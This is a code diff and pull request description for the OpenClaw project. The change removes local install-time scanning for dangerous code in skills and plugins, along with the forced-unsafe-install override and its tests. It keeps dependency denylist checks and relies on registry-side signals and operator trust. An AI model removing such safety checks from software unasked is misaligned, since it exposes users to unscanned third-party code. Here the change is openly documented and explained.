--- a/src/skills/lifecycle/archive-install.ts
+++ b/src/skills/lifecycle/archive-install.ts
@@ -5,10 +5,6 @@ import { pathExists } from "../../infra/fs-safe.js";
 import { withExtractedArchiveRoot } from "../../infra/install-flow.js";
 import { installPackageDir } from "../../infra/install-package-dir.js";
 import { resolveSafeInstallDir } from "../../infra/install-safe-path.js";
-import {
-  scanSkillInstallSource,
-  type InstallSecurityScanResult,
-} from "../../plugins/install-security-scan.js";
 
 const VALID_SLUG_PATTERN = /^[a-z0-9](?:[a-z0-9-]*[a-z0-9])?$/i;
 const DEFAULT_SKILL_ARCHIVE_ROOT_MARKERS = ["SKILL.md"] as const;
@@ -27,14 +23,6 @@ function hasNonAscii(value: string): boolean {
   }
   return false;
 }
-
-type SkillArchiveInstallScan =
-  | false
-  | {
-      dangerouslyForceUnsafeInstall?: boolean;
-      installId?: string;
-      origin: string;
-    };
 
 export type SkillArchiveInstallResult =
   | { ok: true; targetDir: string }
@@ -90,12 +78,6 @@ async function hasSkillArchiveRoot(
   return false;
 }
 
-function scanBlockedFailureKind(
-  blocked: NonNullable<InstallSecurityScanResult["blocked"]>,
-): SkillArchiveInstallFailureKind {
-  return blocked.code === "security_scan_failed" ? "unavailable" : "invalid-request";
-}
-
 const TRANSIENT_ARCHIVE_ERROR_PATTERNS = [
   "enoent",
   "enospc",
@@ -129,7 +111,6 @@ export async function installExtractedSkillRoot(params: {
   mode: "install" | "update";
   timeoutMs?: number;
   logger?: ArchiveLogger;
-  scan?: SkillArchiveInstallScan;
   rootMarkers?: readonly string[];
 }): Promise<SkillArchiveInstallResult> {
   try {
@@ -152,23 +133,6 @@ export async function installExtractedSkillRoot(params: {
         `Skill already exists at ${targetDir}. Re-run with force/update.`,
         "invalid-request",
       );
-    }
-
-    if (params.scan) {
-      const scanResult = await scanSkillInstallSource({
-        dangerouslyForceUnsafeInstall: params.scan.dangerouslyForceUnsafeInstall,
-        installId: params.scan.installId ?? "archive",
-        logger: params.logger ?? {},
-        origin: params.scan.origin,
-        skillName: params.slug,
-        sourceDir: params.extractedRoot,
-      });
-      if (scanResult?.blocked) {
-        return installFailure(
-          scanResult.blocked.reason,
-          scanBlockedFailureKind(scanResult.blocked),
-        );
-      }
     }
 
     const install = await installPackageDir({
@@ -197,7 +161,6 @@ export async function installSkillArchiveFromPath(params: {
   force?: boolean;
   timeoutMs?: number;
   logger?: ArchiveLogger;
-  scan?: SkillArchiveInstallScan;
 }): Promise<SkillArchiveInstallResult> {
   const result = await withExtractedArchiveRoot({
     archivePath: params.archivePath,
@@ -213,7 +176,6 @@ export async function installSkillArchiveFromPath(params: {
         mode: params.force ? "update" : "install",
         timeoutMs: params.timeoutMs,
         logger: params.logger,
-        scan: params.scan,
       }),
   });
   if (!result.ok) {

--- a/src/skills/lifecycle/clawhub.ts
+++ b/src/skills/lifecycle/clawhub.ts
@@ -788,7 +788,6 @@ async function performClawHubSkillInstall(
             extractedRoot: rootDir,
             mode: params.force ? "update" : "install",
             logger: params.logger,
-            scan: false,
             rootMarkers: CLAWHUB_SKILL_ARCHIVE_ROOT_MARKERS,
           }),
       });

--- a/src/skills/lifecycle/install.test.ts
+++ b/src/skills/lifecycle/install.test.ts
@@ -1,11 +1,7 @@
 import fs from "node:fs/promises";
 import path from "node:path";
 import { afterAll, beforeAll, beforeEach, describe, expect, it, vi } from "vitest";
-import {
-  initializeGlobalHookRunner,
-  resetGlobalHookRunner,
-} from "../../plugins/hook-runner-global.js";
-import { createMockPluginRegistry } from "../../plugins/hooks.test-helpers.js";
+import { resetGlobalHookRunner } from "../../plugins/hook-runner-global.js";
 import { captureEnv } from "../../test-utils/env.js";
 import { createFixtureSuite } from "../../test-utils/fixture-suite.js";
 import { resolveOpenClawMetadata, resolveSkillInvocationPolicy } from "../loading/frontmatter.js";
@@ -155,46 +151,20 @@ describe("installSkill code safety scanning", () => {
     });
   });
 
-  it("blocks install when skill has dangerous code patterns", async () => {
+  it("does not run local code scanning before executing skill installers", async () => {
     await withWorkspaceCase(async ({ workspaceDir }) => {
-      const skillDir = await writeInstallableSkill(workspaceDir, "danger-skill");
+      const skillDir = await writeInstallableSkill(workspaceDir, "operator-trusted-skill");
       mockDangerousSkillScanFinding(skillDir);
 
       const result = await installSkill({
         workspaceDir,
-        skillName: "danger-skill",
+        skillName: "operator-trusted-skill",
         installId: "deps",
-      });
-
-      expect(result.ok).toBe(false);
-      expect(result.message).toContain('Skill "danger-skill" installation blocked');
-      const warningOutput = (result.warnings ?? []).join("\n");
-      expect(warningOutput).toContain("dangerous code patterns");
-      expect(warningOutput).toContain("runner.js:1");
-      expect(runCommandWithTimeoutMock).not.toHaveBeenCalled();
-    });
-  });
-
-  it("allows dangerous skill installs when forced unsafe install is set", async () => {
-    await withWorkspaceCase(async ({ workspaceDir }) => {
-      const skillDir = await writeInstallableSkill(workspaceDir, "forced-danger-skill");
-      mockDangerousSkillScanFinding(skillDir);
-
-      const result = await installSkill({
-        workspaceDir,
-        skillName: "forced-danger-skill",
-        installId: "deps",
-        dangerouslyForceUnsafeInstall: true,
       });
 
       expect(result.ok).toBe(true);
-      expect(
-        result.warnings?.some((warning) =>
-          warning.includes(
-            "forced despite dangerous code patterns via --dangerously-force-unsafe-install",
-          ),
-        ),
-      ).toBe(true);
+      expect(scanDirectoryWithSummaryMock).not.toHaveBeenCalled();
+      expect(runCommandWithTimeoutMock).toHaveBeenCalled();
     });
   });
 
@@ -248,144 +218,5 @@ describe("installSkill code safety scanning", () => {
         platform: "linux",
       }),
     ).toBe("/var/lib/openclaw");
-  });
-
-  it("blocks install when skill scan fails", async () => {
-    await withWorkspaceCase(async ({ workspaceDir }) => {
-      await writeInstallableSkill(workspaceDir, "scanfail-skill");
-      scanDirectoryWithSummaryMock.mockRejectedValue(new Error("scanner exploded"));
-
-      const result = await installSkill({
-        workspaceDir,
-        skillName: "scanfail-skill",
-        installId: "deps",
-      });
-
-      expect(result.ok).toBe(false);
-      expect(result.message).toContain("code safety scan failed");
-      expect(runCommandWithTimeoutMock).not.toHaveBeenCalled();
-    });
-  });
-  it("surfaces plugin scanner findings from before_install", async () => {
-    const handler = vi.fn().mockReturnValue({
-      findings: [
-        {
-          ruleId: "org-policy",
-          severity: "warn",
-          file: "policy.json",
-          line: 1,
-          message: "Organization policy requires manual review",
-        },
-      ],
-    });
-    initializeGlobalHookRunner(createMockPluginRegistry([{ hookName: "before_install", handler }]));
-
-    await withWorkspaceCase(async ({ workspaceDir }) => {
-      await writeInstallableSkill(workspaceDir, "policy-skill");
-
-      const result = await installSkill({
-        workspaceDir,
-        skillName: "policy-skill",
-        installId: "deps",
-      });
-
-      expect(result.ok).toBe(true);
-      expect(handler).toHaveBeenCalledTimes(1);
-      const handlerCall = handler.mock.calls[0];
-      const payload = handlerCall?.[0] as
-        | {
-            targetName?: string;
-            targetType?: string;
-            origin?: string;
-            sourcePath?: string;
-            sourcePathKind?: string;
-            request?: { kind?: string; mode?: string };
-            builtinScan?: { status?: string; findings?: unknown[] };
-            skill?: {
-              installId?: string;
-              installSpec?: { kind?: string; package?: string };
-            };
-          }
-        | undefined;
-      expect(payload?.targetName).toBe("policy-skill");
-      expect(payload?.targetType).toBe("skill");
-      expect(payload?.origin).toBe("openclaw-workspace");
-      expect(payload?.sourcePath).toContain("policy-skill");
-      expect(payload?.sourcePathKind).toBe("directory");
-      expect(payload?.request).toEqual({
-        kind: "skill-install",
-        mode: "install",
-      });
-      expect(payload?.builtinScan?.status).toBe("ok");
-      expect(payload?.builtinScan?.findings).toEqual([]);
-      expect(payload?.skill?.installId).toBe("deps");
-      expect(payload?.skill?.installSpec?.kind).toBe("node");
-      expect(payload?.skill?.installSpec?.package).toBe("example-package");
-      expect(handlerCall?.[1]).toEqual({
-        origin: "openclaw-workspace",
-        targetType: "skill",
-        requestKind: "skill-install",
-      });
-      expect(
-        result.warnings?.some((warning) =>
-          warning.includes(
-            "Plugin scanner: Organization policy requires manual review (policy.json:1)",
-          ),
-        ),
-      ).toBe(true);
-    });
-  });
-
-  it("blocks install when before_install rejects the skill", async () => {
-    const handler = vi.fn().mockReturnValue({
-      block: true,
-      blockReason: "Blocked by enterprise policy",
-    });
-    initializeGlobalHookRunner(createMockPluginRegistry([{ hookName: "before_install", handler }]));
-
-    await withWorkspaceCase(async ({ workspaceDir }) => {
-      await writeInstallableSkill(workspaceDir, "blocked-skill");
-
-      const result = await installSkill({
-        workspaceDir,
-        skillName: "blocked-skill",
-        installId: "deps",
-      });
-
-      expect(result.ok).toBe(false);
-      expect(result.message).toBe("Blocked by enterprise policy");
-      expect(runCommandWithTimeoutMock).not.toHaveBeenCalled();
-    });
-  });
-
-  it("keeps before_install hook blocks even when forced unsafe install is set", async () => {
-    const handler = vi.fn().mockReturnValue({
-      block: true,
-      blockReason: "Blocked by enterprise policy",
-    });
-    initializeGlobalHookRunner(createMockPluginRegistry([{ hookName: "before_install", handler }]));
-
-    await withWorkspaceCase(async ({ workspaceDir }) => {
-      const skillDir = await writeInstallableSkill(workspaceDir, "forced-blocked-skill");
-      mockDangerousSkillScanFinding(skillDir);
-
-      const result = await installSkill({
-        workspaceDir,
-        skillName: "forced-blocked-skill",
-        installId: "deps",
-        dangerouslyForceUnsafeInstall: true,
-      });
-
-      expect(result.ok).toBe(false);
-      expect(result.message).toBe("Blocked by enterprise policy");
-      expect(
-        result.warnings?.some((warning) =>
-          warning.includes(
-            "forced despite dangerous code patterns via --dangerously-force-unsafe-install",
-          ),
-        ),
-      ).toBe(true);
-      expect(runCommandWithTimeoutMock).not.toHaveBeenCalled();
-    });
   });
 });

--- a/src/skills/lifecycle/install.ts
+++ b/src/skills/lifecycle/install.ts
@@ -5,11 +5,6 @@ import type { OpenClawConfig } from "../../config/types.openclaw.js";
 import { resolveBrewExecutable as defaultResolveBrewExecutable } from "../../infra/brew.js";
 import { isContainerEnvironment as defaultIsContainerEnvironment } from "../../infra/container-environment.js";
 import { formatErrorMessage } from "../../infra/errors.js";
-import {
-  type InstallSafetyOverrides,
-  scanSkillInstallSource,
-  type SkillInstallSpecMetadata,
-} from "../../plugins/install-security-scan.js";
 import { runCommandWithTimeout, type CommandOptions } from "../../process/exec.js";
 import { resolveUserPath } from "../../utils.js";
 import {
@@ -23,7 +18,7 @@ import { installDownloadSpec } from "./install-download.js";
 import { formatInstallFailureMessage } from "./install-output.js";
 import type { SkillInstallResult } from "./install-types.js";
 
-export type SkillInstallRequest = InstallSafetyOverrides & {
+export type SkillInstallRequest = {
   workspaceDir: string;
   skillName: string;
   installId: string;
@@ -78,24 +73,6 @@ function findInstallSpec(entry: SkillEntry, installId: string): SkillInstallSpec
     }
   }
   return undefined;
-}
-
-function normalizeSkillInstallSpec(spec: SkillInstallSpec): SkillInstallSpecMetadata {
-  return {
-    ...(spec.id ? { id: spec.id } : {}),
-    kind: spec.kind,
-    ...(spec.label ? { label: spec.label } : {}),
-    ...(spec.bins ? { bins: spec.bins.slice() } : {}),
-    ...(spec.os ? { os: spec.os.slice() } : {}),
-    ...(spec.formula ? { formula: spec.formula } : {}),
-    ...(spec.package ? { package: spec.package } : {}),
-    ...(spec.module ? { module: spec.module } : {}),
-    ...(spec.url ? { url: spec.url } : {}),
-    ...(spec.archive ? { archive: spec.archive } : {}),
-    ...(spec.extract !== undefined ? { extract: spec.extract } : {}),
-    ...(spec.stripComponents !== undefined ? { stripComponents: spec.stripComponents } : {}),
-    ...(spec.targetDir ? { targetDir: spec.targetDir } : {}),
-  };
 }
 
 function buildNodeInstallCommand(packageName: string, prefs: SkillsInstallPreferences): string[] {
@@ -471,33 +448,9 @@ export async function installSkill(params: SkillInstallRequest): Promise<SkillIn
     };
   }
 
-  const spec = findInstallSpec(entry, params.installId);
   const warnings: string[] = [];
+  const spec = findInstallSpec(entry, params.installId);
   const skillSource = resolveSkillSource(entry.skill);
-  const normalizedSpec = spec ? normalizeSkillInstallSpec(spec) : undefined;
-  const scanResult = await scanSkillInstallSource({
-    dangerouslyForceUnsafeInstall: params.dangerouslyForceUnsafeInstall,
-    installId: params.installId,
-    ...(normalizedSpec ? { installSpec: normalizedSpec } : {}),
-    logger: {
-      warn: (message) => warnings.push(message),
-    },
-    origin: skillSource,
-    skillName: params.skillName,
-    sourceDir: path.resolve(entry.skill.baseDir),
-  });
-  if (scanResult?.blocked) {
-    return withWarnings(
-      {
-        ok: false,
-        message: scanResult.blocked.reason,
-        stdout: "",
-        stderr: "",
-        code: null,
-      },
-      warnings,
-    );
-  }
   // Warn when install is triggered from a non-bundled source.
   // Workspace/project/personal agent skills can contain attacker-controlled metadata.
   const trustedInstallSources = new Set(["openclaw-bundled", "openclaw-managed", "openclaw-extra"]);

--- a/src/skills/lifecycle/source-install.ts
+++ b/src/skills/lifecycle/source-install.ts
@@ -214,10 +214,6 @@ async function installLocalSkillDir(params: {
     mode: params.force ? "update" : "install",
     timeoutMs: params.timeoutMs,
     logger: params.logger,
-    scan: {
-      installId: params.source,
-      origin: params.sourceSpec,
-    },
   });
   if (!install.ok) {
     return { ok: false, error: install.error };

--- a/src/skills/lifecycle/upload-install.ts
+++ b/src/skills/lifecycle/upload-install.ts
@@ -95,10 +95,6 @@ export async function installUploadedSkillArchive(params: {
         force: record.force,
         timeoutMs: params.timeoutMs,
         logger: params.log,
-        scan: {
-          installId: "upload",
-          origin: "skill-upload",
-        },
       });
       if (!install.ok) {
         const errorKind = uploadInstallFailureErrorKind(install.failureKind);

--- a/ui/src/ui/controllers/skills.test.ts
+++ b/ui/src/ui/controllers/skills.test.ts
@@ -507,13 +507,12 @@ describe("skill mutations", () => {
     },
     {
       name: "installs skills and uses server success messages",
-      run: (state: SkillsState) => installSkill(state, "github", "GitHub", "install-123", true),
+      run: (state: SkillsState) => installSkill(state, "github", "GitHub", "install-123"),
       expectedRequest: [
         "skills.install",
         {
           name: "GitHub",
           installId: "install-123",
-          dangerouslyForceUnsafeInstall: true,
           timeoutMs: 120000,
         },
       ],

--- a/ui/src/ui/controllers/skills.ts
+++ b/ui/src/ui/controllers/skills.ts
@@ -344,13 +344,11 @@ export async function installSkill(
   skillKey: string,
   name: string,
   installId: string,
-  dangerouslyForceUnsafeInstall = false,
 ) {
   await runSkillMutation(state, skillKey, async (client) => {
     const result = await client.request<{ message?: string }>("skills.install", {
       name,
       installId,
-      dangerouslyForceUnsafeInstall,
       timeoutMs: 120000,
     });
     return {


### PR DESCRIPTION
Refs https://github.com/openclaw/openclaw/issues/89414

## Summary

Remove local install-time regex code scanning from skill and plugin install paths while keeping deterministic validation and integrity checks.

## Implementation Notes

- Stopped skill and plugin install flows from calling the local dangerous-code scanner wrappers during install/update.
- Kept deterministic plugin dependency denylist validation through explicit install dependency validation helpers.
- Removed scanner-driven `before_install` invocation from scanner runtime while leaving the hook contract itself in place for future configurable policy/scanner hooks.
- Removed the plugin CLI `--dangerously-force-unsafe-install` option and stopped UI/macOS/gateway skill callers from sending the legacy override; the Gateway protocol still accepts the field for older clients and ignores it.
- Updated docs to describe the ClawHub registry-side security signal model and trusted-by-operator non-ClawHub installs.

## Validation

- `node scripts/run-vitest.mjs src/skills/lifecycle/install.test.ts src/skills/lifecycle/archive-install.test.ts src/gateway/server-methods/skills-upload.test.ts src/gateway/server-methods/skills.clawhub.test.ts src/plugins/install.test.ts src/plugins/install.path.test.ts src/cli/plugins-cli.install.test.ts src/cli/plugins-cli.update.test.ts`
- `git diff --check`

## Notes

`pnpm format:changed` is not defined in this checkout. `pnpm format:diff` formats the full repo, so unrelated formatter-only diffs from that attempt were reverted before this PR was created.


Based on PR #89475 at a4d70ba2:

  - apps/macos/Sources/OpenClaw/GatewayConnection.swift: Removed the macOS client’s dangerouslyForceUnsafeInstall parameter so skill installs no longer
    request scanner bypass behavior.

  - docs/cli/plugins.md: Removed unsafe scanner override docs and replaced them with the new trust model: no local regex scanner, ClawHub signals,
    deterministic validation remains.

  - docs/concepts/agent-loop.md: Reframed before_install as future policy-hook space, not a current scanner-driven install hook.
  - docs/gateway/protocol.md: Updated skills.install protocol to omit scanner override while noting old clients may send it and it is ignored.
  - docs/gateway/security/index.md: Replaced scanner-blocking guidance with operator-trust plus remaining deterministic validation guidance.
  - docs/help/faq.md: Updated safety FAQ to say local install-time regex scanning is gone and ClawHub provides registry-side signals.
  - docs/platforms/mac/skills.md: Updated macOS skill install docs to remove local scanner/blocking language.
  - docs/plugins/hooks.md: Changed before_install docs from active scan-inspection hook to reserved future install-policy hook.
  - docs/plugins/sdk-overview.md: Removed current before_install blocking semantics because install paths no longer invoke it.
  - docs/tools/skills.md: Replaced skill scan override section with the new install trust model.
  - src/cli/plugins-cli.install.test.ts: Removed expectations that install forwards unsafe override and added coverage that legacy flag is accepted but
    ignored.

  - src/cli/plugins-cli.runtime.ts: Removed dangerouslyForceUnsafeInstall from plugin install action options.
  - src/cli/plugins-cli.ts: Hid the legacy unsafe flag as a no-op so old automation does not break while scanner bypass is removed.
  - src/cli/plugins-cli.update.test.ts: Updated update tests so the unsafe flag is not shown or forwarded.
  - src/cli/plugins-install-command.ts: Removed scanner override plumbing from plugin install dispatch and kept only trust-related install options.
  - src/cli/plugins-update-command.ts: Stopped passing unsafe scanner override into plugin updates.
  - src/gateway/server-methods/skills-upload.test.ts: Changed uploaded skill archive test to prove local scanner is not called and install succeeds.
  - src/gateway/server-methods/skills.clawhub.test.ts: Updated gateway skill install test to prove legacy override is ignored.
  - src/gateway/server-methods/skills.ts: Removed forwarding of dangerouslyForceUnsafeInstall into skill installation.
  - src/plugins/install-security-scan.runtime.ts: Removed before_install execution from scanner runtime and split out dependency-only validation helpers.
  - src/plugins/install-security-scan.ts: Exported dependency validation helpers so installs can keep denylist checks without local code scanning.
  - src/plugins/install.npm-spec.e2e.test.ts: Replaced dangerous-code scan rollback cases with dependency-denylist rollback cases.
  - src/plugins/install.npm-spec.test.ts: Updated npm plugin tests so dangerous-looking code no longer blocks, while blocked dependency validation still
    does.

  - src/plugins/install.path.test.ts: Removed plain-file scanner and before_install expectations; verifies file installs no longer locally scan code.
  - src/plugins/install.runtime.ts: Re-exported new dependency validation helpers for plugin install runtime.
  - src/plugins/install.test.ts: Removed broad scanner/before_install blocking tests and updated archive/package/bundle behavior to allow dangerous-looking
    code while retaining dependency checks.

  - src/plugins/install.ts: Replaced install source scanning calls with dependency validation and removed file-plugin code scan before copy.
  - src/skills/lifecycle/archive-install.test.ts: Removed the archive install scan: false expectation because scan control no longer exists.
  - src/skills/lifecycle/archive-install.ts: Removed skill archive scan option and scan-block failure handling.
  - src/skills/lifecycle/clawhub.ts: Stopped passing scanner settings into ClawHub skill archive install.
  - src/skills/lifecycle/install.test.ts: Replaced skill scanner blocking/override/hook tests with proof that installers run without local code scanning.
  - src/skills/lifecycle/install.ts: Removed skill install scan call, scanner metadata normalization, and unsafe override from install requests.
  - src/skills/lifecycle/source-install.ts: Stopped enabling scanner metadata for local/source skill archive installs.
  - src/skills/lifecycle/upload-install.ts: Stopped enabling scanner metadata for uploaded skill archive installs.
  - ui/src/ui/controllers/skills.test.ts: Updated UI test to expect no unsafe override in skills.install request.
  - ui/src/ui/controllers/skills.ts: Removed UI controller parameter that sent scanner override to the gateway.
